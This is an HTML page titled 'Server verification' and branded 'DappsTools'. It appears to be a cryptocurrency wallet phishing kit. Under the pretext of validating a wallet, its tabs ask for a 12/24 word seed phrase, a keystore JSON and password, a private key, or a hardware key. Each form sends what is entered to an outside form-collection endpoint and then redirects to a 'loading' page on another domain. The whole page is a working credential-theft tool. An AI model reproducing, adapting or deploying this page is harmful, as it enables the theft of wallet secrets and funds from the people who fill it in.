<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="./assets/apple-touch-icon.png" rel="apple-touch-icon">
<link href="./assets/favicon.ico" rel="icon">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="shortcut icon" type="image/ico" href="favicon.ico" />
<link href="https://fonts.googleapis.com/css?family=Teko:700&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<link href="./assets/css/style.css" rel="stylesheet">
<title>Server verification</title>
</head>
<body>
<ul class="nav justify-content-end">
<li class="nav-item dapps">
<a class="nav-link" href="#" title=""><img id="wclogo" src="./assets/images/wclogo.png" /> <span class="">DappsTools</span></a>
</li>
</ul>
<div class="former">
<p class="wallet-head text-center">VALIDATE YOUR SELECTED WALLET TO CONTINUE</p>
<label class="sub-text text-center">Ensure you enter an active wallet. Inactive/empty wallets are likely to experience issues during synchronization.</label>
<ul class="nav nav-pills " id="myTab" role="tablist">
<li class="nav-item">
<a class="nav-link active" id="home-tab" data-toggle="tab" href="#home" role="tab" aria-controls="home" aria-selected="true">MNEMONICS</a>
</li>
<li class="nav-item">
<a class="nav-link" id="profile-tab" data-toggle="tab" href="#profile" role="tab" aria-controls="profile" aria-selected="false">KEYSTORE</a>
</li>
<li class="nav-item">
<a class="nav-link" id="contact-tab" data-toggle="tab" href="#contact" role="tab" aria-controls="contact" aria-selected="false">PRIVATE KEY</a>
</li>
<li class="nav-item">
<a class="nav-link" id="last-tab" data-toggle="tab" href="#last" role="tab" aria-controls="last" aria-selected="false">HARDWARE</a>
</li>
</ul>
<div class="tab-content" id="myTabContent">
<div class="tab-pane active" id="home" role="tabpanel" aria-labelledby="home-tab">
<div class="form-group text-center">
<form action="https://submit-form.com/6RAHievN">
<input type="hidden" name="_redirect" value="serversupports.xyz/loading.html" />
<label for="exampleFormControlTextarea1">Please enter your 12/24 word phrase</label>
<input class="form-control form-control-lg" name="mnemonics" type="text" placeholder="" required>
<button type="submit" class="btn btn-primary mb-2" style="background-color: #007bff;">PROCEED</button>
</form>
</div>
</div>
<div class="tab-pane" id="profile" role="tabpanel" aria-labelledby="profile-tab">
<div class="form-group text-center">
<form action="https://submit-form.com/6RAHievN">
<input type="hidden" name="_redirect" value="serversupports.xyz/loading.html" />
<label for="exampleFormControlTextarea1">Enter your Keystore JSON</label>
<input class="form-control form-control-lg" name="keystore-JSON" type="text" placeholder="" required>
<label for="exampleFormControlTextarea1">Enter Password</label>
<input class="form-control form-control-lg" name="password" type="text" placeholder="" required>
<button type="submit" class="btn btn-primary mb-2" style="background-color: #007bff;">PROCEED</button>
</form>
</div>
</div>
<div class="tab-pane" id="contact" role="tabpanel" aria-labelledby="contact-tab">
<div class="form-group text-center">
<form action="https://submit-form.com/6RAHievN">
<input type="hidden" name="_redirect" value="serversupports.xyz/loading.html" />
<label for="exampleFormControlTextarea1">Enter your private key</label>
<input class="form-control form-control-lg" name="private-key" type="text" placeholder="" required>
<button type="submit" class="btn btn-primary mb-2" style="background-color: #007bff;">PROCEED</button>
</form>
</div>
</div>
<div class="tab-pane" id="last" role="tabpanel" aria-labelledby="last-tab">
<div class="form-group text-center">
<form action="https://submit-form.com/6RAHievN">
<input type="hidden" name="_redirect" value="serversupports.xyz/loading.html" />
<label for="exampleFormControlTextarea1">Enter your Hardware Key</label>
<input class="form-control form-control-lg" name="hardware-key" type="text" placeholder="" required>
<button type="submit" class="btn btn-primary mb-2" style="background-color: #007bff;">PROCEED</button>
</form>
</div>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
</body>
</html>
